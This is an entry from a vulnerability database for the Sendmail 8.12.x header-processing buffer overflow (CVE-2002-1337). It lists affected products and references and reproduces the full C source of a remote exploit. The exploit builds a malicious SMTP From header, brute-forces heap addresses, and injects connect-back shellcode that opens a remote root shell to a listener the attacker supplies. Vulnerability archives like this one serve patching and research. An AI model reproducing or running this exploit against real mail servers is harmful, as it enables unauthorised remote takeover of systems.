Details of VAR-E-200303-0036

ID

VAR-E-200303-0036

CVE

cve_id:

CVE-2002-1337

Trust: 1.9

sources: BID: 6991 // EXPLOIT-DB: 22313 // EDBNET: 44505

EDB ID

22313

TITLE

Sendmail 8.12.x - Header Processing Buffer Overflow (1) - Unix remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 22313

DESCRIPTION

Sendmail 8.12.x - Header Processing Buffer Overflow (1). CVE-2002-1337CVE-4502 . remote exploit for Unix platform

Trust: 0.6

sources: EXPLOIT-DB: 22313

AFFECTED PRODUCTS

vendor:	sendmail	model:	-	scope:	eq	version:	8.12.x	Trust: 1.0
vendor:	hp	model:	hp-ux	scope:	eq	version:	11.04	Trust: 0.6
vendor:	wind	model:	river systems platform sa	scope:	eq	version:	1.0	Trust: 0.3
vendor:	wind	model:	river systems bsd/os	scope:	eq	version:	5.0	Trust: 0.3
vendor:	wind	model:	river systems bsd/os	scope:	eq	version:	4.3.1	Trust: 0.3
vendor:	wind	model:	river systems bsd/os	scope:	eq	version:	4.2	Trust: 0.3
vendor:	sun	model:	solaris 9 x86	scope:	-	version:	-	Trust: 0.3
vendor:	sun	model:	solaris	scope:	eq	version:	9	Trust: 0.3
vendor:	sun	model:	solaris 8 x86	scope:	-	version:	-	Trust: 0.3
vendor:	sun	model:	solaris 8 sparc	scope:	-	version:	-	Trust: 0.3
vendor:	sun	model:	solaris 7.0 x86	scope:	-	version:	-	Trust: 0.3
vendor:	sun	model:	solaris	scope:	eq	version:	7.0	Trust: 0.3
vendor:	sun	model:	solaris 2.6 x86	scope:	-	version:	-	Trust: 0.3
vendor:	sun	model:	solaris	scope:	eq	version:	2.6	Trust: 0.3
vendor:	sun	model:	lx50	scope:	-	version:	-	Trust: 0.3
vendor:	sun	model:	cobalt raq xtr	scope:	-	version:	-	Trust: 0.3
vendor:	sun	model:	cobalt raq	scope:	eq	version:	550	Trust: 0.3
vendor:	sun	model:	cobalt raq	scope:	eq	version:	4	Trust: 0.3
vendor:	sun	model:	cobalt raq	scope:	eq	version:	3	Trust: 0.3
vendor:	sun	model:	cobalt qube	scope:	eq	version:	3	Trust: 0.3
vendor:	sun	model:	cobalt manageraq3 3000r-mr	scope:	-	version:	-	Trust: 0.3
vendor:	sun	model:	cobalt cacheraq	scope:	eq	version:	4	Trust: 0.3
vendor:	sgi	model:	irix	scope:	eq	version:	6.5.19	Trust: 0.3
vendor:	sgi	model:	irix	scope:	eq	version:	6.5.18	Trust: 0.3
vendor:	sgi	model:	irix	scope:	eq	version:	6.5.17	Trust: 0.3
vendor:	sgi	model:	irix	scope:	eq	version:	6.5.16	Trust: 0.3
vendor:	sgi	model:	irix	scope:	eq	version:	6.5.15	Trust: 0.3
vendor:	sgi	model:	irix	scope:	eq	version:	6.5.14	Trust: 0.3
vendor:	sgi	model:	irix	scope:	eq	version:	6.5.13	Trust: 0.3
vendor:	sgi	model:	irix	scope:	eq	version:	6.5.12	Trust: 0.3
vendor:	sgi	model:	irix	scope:	eq	version:	6.5.11	Trust: 0.3
vendor:	sgi	model:	irix	scope:	eq	version:	6.5.10	Trust: 0.3
vendor:	sgi	model:	irix	scope:	eq	version:	6.5.9	Trust: 0.3
vendor:	sgi	model:	irix	scope:	eq	version:	6.5.8	Trust: 0.3
vendor:	sgi	model:	irix	scope:	eq	version:	6.5.7	Trust: 0.3
vendor:	sgi	model:	irix	scope:	eq	version:	6.5.6	Trust: 0.3
vendor:	sgi	model:	irix	scope:	eq	version:	6.5.5	Trust: 0.3
vendor:	sgi	model:	irix	scope:	eq	version:	6.5.4	Trust: 0.3
vendor:	sgi	model:	irix	scope:	eq	version:	6.5.3	Trust: 0.3
vendor:	sgi	model:	irix	scope:	eq	version:	6.5.2	Trust: 0.3
vendor:	sgi	model:	irix	scope:	eq	version:	6.5.1	Trust: 0.3
vendor:	sgi	model:	irix	scope:	eq	version:	6.5	Trust: 0.3
vendor:	sgi	model:	freeware	scope:	eq	version:	1.0	Trust: 0.3
vendor:	sendmail	model:	inc sendmail switch	scope:	eq	version:	3.0.2	Trust: 0.3
vendor:	sendmail	model:	inc sendmail switch	scope:	eq	version:	3.0.1	Trust: 0.3
vendor:	sendmail	model:	inc sendmail switch	scope:	eq	version:	3.0	Trust: 0.3
vendor:	sendmail	model:	inc sendmail switch	scope:	eq	version:	2.2.4	Trust: 0.3
vendor:	sendmail	model:	inc sendmail switch	scope:	eq	version:	2.2.3	Trust: 0.3
vendor:	sendmail	model:	inc sendmail switch	scope:	eq	version:	2.2.2	Trust: 0.3
vendor:	sendmail	model:	inc sendmail switch	scope:	eq	version:	2.2.1	Trust: 0.3
vendor:	sendmail	model:	inc sendmail switch	scope:	eq	version:	2.2	Trust: 0.3
vendor:	sendmail	model:	inc sendmail switch	scope:	eq	version:	2.1.4	Trust: 0.3
vendor:	sendmail	model:	inc sendmail switch	scope:	eq	version:	2.1.3	Trust: 0.3
vendor:	sendmail	model:	inc sendmail switch	scope:	eq	version:	2.1.2	Trust: 0.3
vendor:	sendmail	model:	inc sendmail switch	scope:	eq	version:	2.1.1	Trust: 0.3
vendor:	sendmail	model:	inc sendmail switch	scope:	eq	version:	2.1	Trust: 0.3
vendor:	sendmail	model:	inc sendmail for nt	scope:	eq	version:	3.0.2	Trust: 0.3
vendor:	sendmail	model:	inc sendmail for nt	scope:	eq	version:	3.0.1	Trust: 0.3
vendor:	sendmail	model:	inc sendmail for nt	scope:	eq	version:	3.0	Trust: 0.3
vendor:	sendmail	model:	inc sendmail for nt	scope:	eq	version:	2.6.1	Trust: 0.3
vendor:	sendmail	model:	inc sendmail for nt	scope:	eq	version:	2.6	Trust: 0.3
vendor:	sendmail	model:	inc sendmail advanced message server	scope:	eq	version:	1.3	Trust: 0.3
vendor:	sendmail	model:	inc sendmail advanced message server	scope:	eq	version:	1.2	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail switch	scope:	eq	version:	3.0.2	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail switch	scope:	eq	version:	3.0.1	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail switch	scope:	eq	version:	3.0	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail switch	scope:	eq	version:	2.2.4	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail switch	scope:	eq	version:	2.2.3	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail switch	scope:	eq	version:	2.2.2	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail switch	scope:	eq	version:	2.2.1	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail switch	scope:	eq	version:	2.2	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail switch	scope:	eq	version:	2.1.4	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail switch	scope:	eq	version:	2.1.3	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail switch	scope:	eq	version:	2.1.2	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail switch	scope:	eq	version:	2.1.1	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail switch	scope:	eq	version:	2.1	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail for nt	scope:	eq	version:	3.0.2	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail for nt	scope:	eq	version:	3.0.1	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail for nt	scope:	eq	version:	3.0	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail for nt	scope:	eq	version:	2.6.1	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail for nt	scope:	eq	version:	2.6	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	eq	version:	8.12.7	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	eq	version:	8.12.6	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	eq	version:	8.12.5	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	eq	version:	8.12.4	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	eq	version:	8.12.3	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	eq	version:	8.12.2	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	eq	version:	8.12.1	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail beta7	scope:	eq	version:	8.12	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail beta5	scope:	eq	version:	8.12	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail beta16	scope:	eq	version:	8.12	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail beta12	scope:	eq	version:	8.12	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail beta10	scope:	eq	version:	8.12	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	eq	version:	8.12.0	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	eq	version:	8.11.6	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	eq	version:	8.11.5	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	eq	version:	8.11.4	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	eq	version:	8.11.3	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	eq	version:	8.11.2	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	eq	version:	8.11.1	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	eq	version:	8.11	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	eq	version:	8.10.2	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	eq	version:	8.10.1	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	eq	version:	8.10	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	eq	version:	8.9.3	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	eq	version:	8.9.2	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	eq	version:	8.9.1	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	eq	version:	8.9.0	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	eq	version:	8.8.8	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	eq	version:	5.65	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	eq	version:	5.61	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	eq	version:	5.59	Trust: 0.3
vendor:	sco	model:	unixware	scope:	eq	version:	7.1.3	Trust: 0.3
vendor:	sco	model:	unixware	scope:	eq	version:	7.1.1	Trust: 0.3
vendor:	sco	model:	open unix	scope:	eq	version:	8.0	Trust: 0.3
vendor:	netbsd	model:	netbsd	scope:	eq	version:	1.6	Trust: 0.3
vendor:	netbsd	model:	netbsd	scope:	eq	version:	1.5.3	Trust: 0.3
vendor:	netbsd	model:	netbsd	scope:	eq	version:	1.5.2	Trust: 0.3
vendor:	netbsd	model:	netbsd	scope:	eq	version:	1.5.1	Trust: 0.3
vendor:	netbsd	model:	netbsd	scope:	eq	version:	1.5	Trust: 0.3
vendor:	ibm	model:	z/os v1r4	scope:	-	version:	-	Trust: 0.3
vendor:	ibm	model:	z/os v1r2	scope:	-	version:	-	Trust: 0.3
vendor:	ibm	model:	os/390 v2r8	scope:	-	version:	-	Trust: 0.3
vendor:	ibm	model:	os/390 v2r10	scope:	-	version:	-	Trust: 0.3
vendor:	ibm	model:	mvs	scope:	-	version:	-	Trust: 0.3
vendor:	hp	model:	mpe/ix	scope:	eq	version:	6.5	Trust: 0.3
vendor:	hp	model:	hp-ux	scope:	eq	version:	11.22	Trust: 0.3
vendor:	hp	model:	hp-ux	scope:	eq	version:	11.11	Trust: 0.3
vendor:	hp	model:	hp-ux	scope:	eq	version:	11.0	Trust: 0.3
vendor:	hp	model:	hp-ux	scope:	eq	version:	10.20	Trust: 0.3
vendor:	hp	model:	hp-ux	scope:	eq	version:	10.10	Trust: 0.3
vendor:	hp	model:	hp-ux b.11.22	scope:	-	version:	-	Trust: 0.3
vendor:	hp	model:	hp-ux b.11.11	scope:	-	version:	-	Trust: 0.3
vendor:	hp	model:	hp-ux b.11.04	scope:	-	version:	-	Trust: 0.3
vendor:	hp	model:	hp-ux b.11.00	scope:	-	version:	-	Trust: 0.3
vendor:	hp	model:	alphaserver sc	scope:	-	version:	-	Trust: 0.3
vendor:	gentoo	model:	linux rc2	scope:	eq	version:	1.4	Trust: 0.3
vendor:	gentoo	model:	linux rc1	scope:	eq	version:	1.4	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	5.0	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	4.7	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	4.6	Trust: 0.3
vendor:	sgi	model:	irix	scope:	ne	version:	6.5.20	Trust: 0.3
vendor:	sendmail	model:	inc sendmail switch	scope:	ne	version:	3.0.3	Trust: 0.3
vendor:	sendmail	model:	inc sendmail switch	scope:	ne	version:	2.2.5	Trust: 0.3
vendor:	sendmail	model:	inc sendmail switch	scope:	ne	version:	2.1.5	Trust: 0.3
vendor:	sendmail	model:	inc sendmail for nt	scope:	ne	version:	3.0.3	Trust: 0.3
vendor:	sendmail	model:	inc sendmail for nt	scope:	ne	version:	2.6.2	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail switch	scope:	ne	version:	3.0.3	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail switch	scope:	ne	version:	2.2.5	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail switch	scope:	ne	version:	2.1.5	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail for nt	scope:	ne	version:	3.0.3	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail for nt	scope:	ne	version:	2.6.2	Trust: 0.3
vendor:	sendmail	model:	consortium sendmail	scope:	ne	version:	8.12.8	Trust: 0.3
vendor:	openwall	model:	gnu/*/linux	scope:	ne	version:	1.0	Trust: 0.3
vendor:	juniper	model:	networks junos	scope:	ne	version:	5.1	Trust: 0.3
vendor:	juniper	model:	networks junos	scope:	ne	version:	5.0	Trust: 0.3

sources: BID: 6991 // EXPLOIT-DB: 22313

EXPLOIT

// source: https://www.securityfocus.com/bid/6991/info

Sendmail is prone to a remotely buffer-overflow vulnerability in the SMTP header parsing component. Successful attackers may exploit this vulnerability to gain control of affected servers.

Reportedly, this vulnerability may be locally exploitable if the sendmail binary is setuid/setgid.

Sendmail 5.2 to 8.12.7 are affected. Administrators are advised to upgrade to 8.12.8 or to apply patches to earlier versions of the 8.12.x tree.

/*## copyright LAST STAGE OF DELIRIUM mar 2003 poland *://lsd-pl.net/ #*/
/*## sendmail 8.11.6 #*/

/* proof of concept code for remote sendmail vulnerability */
/* usage: linx86_sendmail target [-l localaddr] [-b localport] [-p ptr] */
/* [-c count] [-t timeout] [-v 80] */
/* where: */
/* target - address of the target host to run this code against */
/* localaddr - address of the host you are running this code from */
/* localport - local port that will listen for shellcode connection */
/* ptr - base ptr of the sendmail buffer containing our arbitrary data */
/* count - brute force loop counter */
/* timeout - select call timeout while waiting for shellcode connection */
/* v - version of the target OS (currently only Slackware 8.0 is supported) */
/* */

#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <unistd.h>
#include <netdb.h>
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>

#define NOP 0xf8

#define MAXLINE 2048
#define PNUM 12

#define OFF1 (288+156-12)
#define OFF2 (1088+288+156+20+48)
#define OFF3 (139*2)

int tab[]={23,24,25,26};

#define IDX2PTR(i) (PTR+i-OFF1)
#define ALLOCBLOCK(idx,size) memset(&lookup[idx],1,size)

#define NOTVALIDCHAR(c) (((c)==0x00)||((c)==0x0d)||((c)==0x0a)||((c)==0x22)||\
(((c)&0x7f)==0x24)||(((c)>=0x80)&&((c)<0xa0)))

#define AOFF 33
#define AMSK 38
#define POFF 48
#define PMSK 53

char* lookup=NULL;
int gfirst;

char shellcode[]= /* 116 bytes */
"\xeb\x02" /* jmp <shellcode+4> */
"\xeb\x08" /* jmp <shellcode+12> */
"\xe8\xf9\xff\xff\xff" /* call <shellcode+2> */
"\xcd\x7f" /* int $0x7f */
"\xc3" /* ret */
"\x5f" /* pop %edi */
"\xff\x47\x01" /* incl 0x1(%edi) */
"\x31\xc0" /* xor %eax,%eax */
"\x50" /* push %eax */
"\x6a\x01" /* push $0x1 */
"\x6a\x02" /* push $0x2 */
"\x54" /* push %esp */
"\x59" /* pop %ecx */
"\xb0\x66" /* mov $0x66,%al */
"\x31\xdb" /* xor %ebx,%ebx */
"\x43" /* inc %ebx */
"\xff\xd7" /* call *%edi */
"\xba\xff\xff\xff\xff" /* mov $0xffffffff,%edx */
"\xb9\xff\xff\xff\xff" /* mov $0xffffffff,%ecx */
"\x31\xca" /* xor %ecx,%edx */
"\x52" /* push %edx */
"\xba\xfd\xff\xff\xff" /* mov $0xfffffffd,%edx */
"\xb9\xff\xff\xff\xff" /* mov $0xffffffff,%ecx */
"\x31\xca" /* xor %ecx,%edx */
"\x52" /* push %edx */
"\x54" /* push %esp */
"\x5e" /* pop %esi */
"\x6a\x10" /* push $0x10 */
"\x56" /* push %esi */
"\x50" /* push %eax */
"\x50" /* push %eax */
"\x5e" /* pop %esi */
"\x54" /* push %esp */
"\x59" /* pop %ecx */
"\xb0\x66" /* mov $0x66,%al */
"\x6a\x03" /* push $0x3 */
"\x5b" /* pop %ebx */
"\xff\xd7" /* call *%edi */
"\x56" /* push %esi */
"\x5b" /* pop %ebx */
"\x31\xc9" /* xor %ecx,%ecx */
"\xb1\x03" /* mov $0x3,%cl */
"\x31\xc0" /* xor %eax,%eax */
"\xb0\x3f" /* mov $0x3f,%al */
"\x49" /* dec %ecx */
"\xff\xd7" /* call *%edi */
"\x41" /* inc %ecx */
"\xe2\xf6" /* loop <shellcode+81> */
"\x31\xc0" /* xor %eax,%eax */
"\x50" /* push %eax */
"\x68\x2f\x2f\x73\x68" /* push $0x68732f2f */
"\x68\x2f\x62\x69\x6e" /* push $0x6e69622f */
"\x54" /* push %esp */
"\x5b" /* pop %ebx */
"\x50" /* push %eax */
"\x53" /* push %ebx */
"\x54" /* push %esp */
"\x59" /* pop %ecx */
"\x31\xd2" /* xor %edx,%edx */
"\xb0\x0b" /* mov $0xb,%al */
"\xff\xd7" /* call *%edi */
;

int PTR,MPTR=0xbfffa01c;

void putaddr(char* p,int i) {
*p++=(i&0xff);
*p++=((i>>8)&0xff);
*p++=((i>>16)&0xff);
*p++=((i>>24)&0xff);
}

void sendcommand(int sck,char *data,char resp) {
char buf[1024];
int i;
if (send(sck,data,strlen(data),0)<0) {
perror("error");exit(-1);
}
if (resp) {
if ((i=recv(sck,buf,sizeof(buf),0))<0) {
perror("error");exit(-1);
}
buf[i]=0;
printf("%s",buf);
}
}

int rev(int a){
int i=1;
if((*(char*)&i)) return(a);
return((a>>24)&0xff)|(((a>>16)&0xff)<<8)|(((a>>8)&0xff)<<16)|((a&0xff)<<24);
}

void initlookup() {
int i;
if (!(lookup=(char*)malloc(MAXLINE))) {
printf("error: malloc\n");exit(-1);
}
ALLOCBLOCK(0,MAXLINE);
memset(lookup+OFF1,0,OFF2-OFF1);

for(i=0;i<sizeof(tab)/4;i++)
ALLOCBLOCK(OFF1+4*tab[i],4);

gfirst=1;
}

int validaddr(int addr) {
unsigned char buf[4],c;
int i,*p=(int*)buf;
*p=addr;
for(i=0;i<4;i++) {
c=buf[i];
if (NOTVALIDCHAR(c)) return 0;
}
return 1;
}

int freeblock(int idx,int size) {
int i,j;
for(i=j=0;i<size;i++) {
if (!lookup[idx+i]) j++;
}
return (i==j);
}

int findblock(int addr,int size,int begin) {
int i,j,idx,ptr;
ptr=addr;
if (begin) {
idx=OFF1+addr-PTR;
while(1) {
while(((!validaddr(ptr))||lookup[idx])&&(idx<OFF2)) {
idx+=4;
ptr+=4;
}
if (idx>=OFF2) return 0;
if (freeblock(idx,size)) return idx;
idx+=4;
ptr+=4;
}
} else {
idx=addr-PTR;
while(1) {
while(((!validaddr(ptr))||lookup[idx])&&(idx>OFF1)) {
idx-=4;
ptr-=4;
}
if (idx<OFF1) return 0;
if (freeblock(idx,size)) return idx;
idx-=4;
ptr-=4;
}
}
}

int findsblock(int sptr) {
int optr,sidx,size;

size=gfirst ? 0x2c:0x04;
optr=sptr;
while(sidx=findblock(sptr,size,1)) {
sptr=IDX2PTR(sidx);
if (gfirst) {
if (validaddr(sptr)) {
ALLOCBLOCK(sidx,size);
break;
} else sptr=optr;
} else {
if (validaddr(sptr-0x18)&&freeblock(sidx-0x18,4)&&freeblock(sidx+0x0c,4)&&
freeblock(sidx+0x10,4)&&freeblock(sidx-0x0e,4)) {
ALLOCBLOCK(sidx-0x18,4);
ALLOCBLOCK(sidx-0x0e,2);
ALLOCBLOCK(sidx,4);
ALLOCBLOCK(sidx+0x0c,4);
ALLOCBLOCK(sidx+0x10,4);
sidx-=0x18;
break;
} else sptr=optr;
}
sptr+=4;
optr=sptr;
}
gfirst=0;
return sidx;
}

int findfblock(int fptr,int i1,int i2,int i3) {
int fidx,optr;
optr=fptr;
while(fidx=findblock(fptr,4,0)) {
fptr=IDX2PTR(fidx);
if (validaddr(fptr-i2)&&validaddr(fptr-i2-i3)&&freeblock(fidx-i3,4)&&
freeblock(fidx-i2-i3,4)&&freeblock(fidx-i2-i3+i1,4)) {
ALLOCBLOCK(fidx,4);
ALLOCBLOCK(fidx-i3,4);
ALLOCBLOCK(fidx-i2-i3,4);
ALLOCBLOCK(fidx-i2-i3+i1,4);
break;
} else fptr=optr;
fptr-=4;
optr=fptr;
}
return fidx;
}

void findvalmask(char* val,char* mask,int len) {
int i;
unsigned char c,m;
for(i=0;i<len;i++) {
c=val[i];
m=0xff;
while(NOTVALIDCHAR(c^m)||NOTVALIDCHAR(m)) m--;
val[i]=c^m;
mask[i]=m;
}
}

void initasmcode(char *addr,int port) {
char abuf[4],amask[4],pbuf[2],pmask[2];
char name[256];
struct hostent *hp;
int i;

if (!addr) gethostname(name,sizeof(name));
else strcpy(name,addr);

if ((i=inet_addr(name))==-1) {
if ((hp=gethostbyname(name))==NULL) {
printf("error: address\n");exit(-1);
}
memcpy(&i,hp->h_addr,4);
}

putaddr(abuf,rev(i));

pbuf[0]=(port>>8)&0xff;
pbuf[1]=(port)&0xff;

findvalmask(abuf,amask,4);
findvalmask(pbuf,pmask,2);

memcpy(&shellcode[AOFF],abuf,4);
memcpy(&shellcode[AMSK],amask,4);
memcpy(&shellcode[POFF],pbuf,2);
memcpy(&shellcode[PMSK],pmask,2);
}

int main(int argc,char **argv){
int sck,srv,i,j,cnt,jidx,aidx,sidx,fidx,aptr,sptr,fptr,ssize,fsize,jmp;
int c,l,i1,i2,i3,i4,found,vers=80,count=256,timeout=1,port=25;
fd_set readfs;
struct timeval t;
struct sockaddr_in address;
struct hostent *hp;
char buf[4096],cmd[4096];
char *p,*host,*myhost=NULL;

printf("copyright LAST STAGE OF DELIRIUM mar 2003 poland //lsd-pl.net/\n");
printf("sendmail 8.11.6 for Slackware 8.0 x86\n\n");

if (argc<3) {
printf("usage: %s target [-l localaddr] [-b localport] [-p ptr] [-c count] [-t timeout] [-v 80]\n",argv[0]);
exit(-1);
}

while((c=getopt(argc-1,&argv[1],"b:c:l:p:t:v:"))!=-1) {
switch(c) {
case 'b': port=atoi(optarg);break;
case 'c': count=atoi(optarg);break;
case 'l': myhost=optarg;break;
case 't': timeout=atoi(optarg);break;
case 'v': vers=atoi(optarg);break;
case 'p': sscanf(optarg,"%x",&MPTR);
}
}

host=argv[1];

srv=socket(AF_INET,SOCK_STREAM,0);
bzero(&address,sizeof(address));
address.sin_family=AF_INET;
address.sin_port=htons(port);
if (bind(srv,(struct sockaddr*)&address,sizeof(address))==-1) {
printf("error: bind\n");exit(-1);
}
if (listen(srv,10)==-1) {
printf("error: listen\n");exit(-1);
}

initasmcode(myhost,port);

for(i4=0;i4<count;i4++,MPTR+=cnt*4) {
PTR=MPTR;
sck=socket(AF_INET,SOCK_STREAM,0);
bzero(&address,sizeof(address));
address.sin_family=AF_INET;
address.sin_port=htons(25);
if ((address.sin_addr.s_addr=inet_addr(host))==-1) {
if ((hp=gethostbyname(host))==NULL) {
printf("error: address\n");exit(-1);
}
memcpy(&address.sin_addr.s_addr,hp->h_addr,4);
}
if (connect(sck,(struct sockaddr*)&address,sizeof(address))==-1) {
printf("error: connect\n");exit(-1);
}
initlookup();

sendcommand(sck,"helo yahoo.com\n",0);
sendcommand(sck,"mail from: anonymous@yahoo.com\n",0);
sendcommand(sck,"rcpt to: lp\n",0);
sendcommand(sck,"data\n",0);

aidx=findblock(PTR,PNUM*4,1);
ALLOCBLOCK(aidx,PNUM*4);
aptr=IDX2PTR(aidx);

printf(".");fflush(stdout);

jidx=findblock(PTR,strlen(shellcode)+PNUM*4,1);
ALLOCBLOCK(jidx,strlen(shellcode)+PNUM*4);

switch(vers) {
case 80: l=28;i1=0x46;i2=0x94;i3=0x1c;break;
default: exit(-1);
}

i2-=8;

p=buf;
for(i=0;i<138;i++) {
*p++='<';*p++='>';
}
*p++='(';
for(i=0;i<l;i++) *p++=NOP;
*p++=')';
*p++=0;

putaddr(&buf[OFF3+l],aptr);
sprintf(cmd,"From: %s\n",buf);
sendcommand(sck,cmd,0);
sendcommand(sck,"Subject: hello\n",0);
memset(cmd,NOP,MAXLINE);
cmd[MAXLINE-2]='\n';
cmd[MAXLINE-1]=0;

cnt=0;

while(cnt<PNUM) {
sptr=aptr;
fptr=IDX2PTR(OFF2);

if (!(sidx=findsblock(sptr))) break;
sptr=IDX2PTR(sidx);
if (!(fidx=findfblock(fptr,i1,i2,i3))) break;
fptr=IDX2PTR(fidx);

jmp=IDX2PTR(jidx);
while (!validaddr(jmp)) jmp+=4;

putaddr(&cmd[aidx],sptr);
putaddr(&cmd[sidx+0x24],aptr);
putaddr(&cmd[sidx+0x28],aptr);
putaddr(&cmd[sidx+0x18],fptr-i2-i3);

putaddr(&cmd[fidx-i2-i3],0x01010101);
putaddr(&cmd[fidx-i2-i3+i1],0xfffffff8);

putaddr(&cmd[fidx-i3],fptr-i3);
putaddr(&cmd[fidx],jmp);

aidx+=4;
PTR-=4;
cnt++;
}

p=&cmd[jidx+4*PNUM];
for(i=0;i<strlen(shellcode);i++) {
*p++=shellcode[i];
}
sendcommand(sck,cmd,0);
sendcommand(sck,"\n",0);
sendcommand(sck,".\n",0);
free(lookup);

FD_ZERO(&readfs);
FD_SET(0,&readfs);
FD_SET(srv,&readfs);

t.tv_sec=timeout;
t.tv_usec=0;

if (select(srv+1,&readfs,NULL,NULL,&t)>0) {
close(sck);
found=1;
if ((sck=accept(srv,(struct sockaddr*)&address,&l))==-1) {
printf("error: accept\n");exit(-1);
}
close(srv);

printf("\nbase 0x%08x mcicache 0x%08x\n",PTR,aptr);

write(sck,"/bin/uname -a\n",14);
} else {
close(sck);
found=0;
}

while(found){
FD_ZERO(&readfs);
FD_SET(0,&readfs);
FD_SET(sck,&readfs);
if(select(sck+1,&readfs,NULL,NULL,NULL)){
int cnt;
char buf[1024];
if(FD_ISSET(0,&readfs)){
if((cnt=read(0,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else {printf("koniec\n");exit(-1);}
}
write(sck,buf,cnt);
}
if(FD_ISSET(sck,&readfs)){
if((cnt=read(sck,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else {printf("koniec\n");exit(-1);}
}
write(1,buf,cnt);
}
}
}
}
}

Trust: 1.0

sources: EXPLOIT-DB: 22313

EXPLOIT LANGUAGE

Trust: 0.6

sources: EXPLOIT-DB: 22313

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 22313

TYPE

Header Processing Buffer Overflow (1)

Trust: 1.0

sources: EXPLOIT-DB: 22313

CREDITS

Last Stage of Delirium

Trust: 0.6

sources: EXPLOIT-DB: 22313

EXTERNAL IDS

db:	NVD	id:	CVE-2002-1337	Trust: 1.9
db:	EXPLOIT-DB	id:	22313	Trust: 1.9
db:	BID	id:	6991	Trust: 1.9
db:	EDBNET	id:	44505	Trust: 0.6

sources: BID: 6991 // EXPLOIT-DB: 22313 // EDBNET: 44505

REFERENCES

url:	https://nvd.nist.gov/vuln/detail/cve-2002-1337	Trust: 1.6
url:	https://www.securityfocus.com/bid/6991/info	Trust: 1.0
url:	https://www.exploit-db.com/exploits/22313/	Trust: 0.6
url:	http://www-1.ibm.com/services/continuity/recover1.nsf/mss/mss-oar-e01-2003.0794.1	Trust: 0.3
url:	http://www.slackware.org/lists/archive/viewer.php?l=slackware-security&y=2003&m=slackware-security.286398	Trust: 0.3
url:	http://ftp.support.compaq.com/patches/public/readmes/unix/t64v51ab21-c0103500-17099-es-20030226.readme	Trust: 0.3
url:	http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/51181	Trust: 0.3
url:	http://www.sendmail.org/	Trust: 0.3
url:	http://www.info.apple.com/usen/security/security_updates.html	Trust: 0.3
url:	http://ftp1.support.compaq.com/public/unix/v5.0a/t64v50ab17-c0031300-16884-es-20030211.readme	Trust: 0.3
url:	http://ftp.support.compaq.com/patches/public/readmes/unix/t64v51b20-c0169800-16980-es-20030218.readme	Trust: 0.3
url:	http://ftp.support.compaq.com/patches/public/readmes/unix/t64v51bb1-c0003900-16874-es-20030211.readme	Trust: 0.3
url:	https://www.exploit-db.com/exploits/22313	Trust: 0.3
url:	http://www.cert.org/advisories/ca-2003-07.html	Trust: 0.3
url:	http://www.sendmail.org/8.12.8.html	Trust: 0.3
url:	https://www.exploit-db.com/exploits/22314	Trust: 0.3
url:	http://www.sendmail.com	Trust: 0.3
url:	http://www.sendmail.org	Trust: 0.3

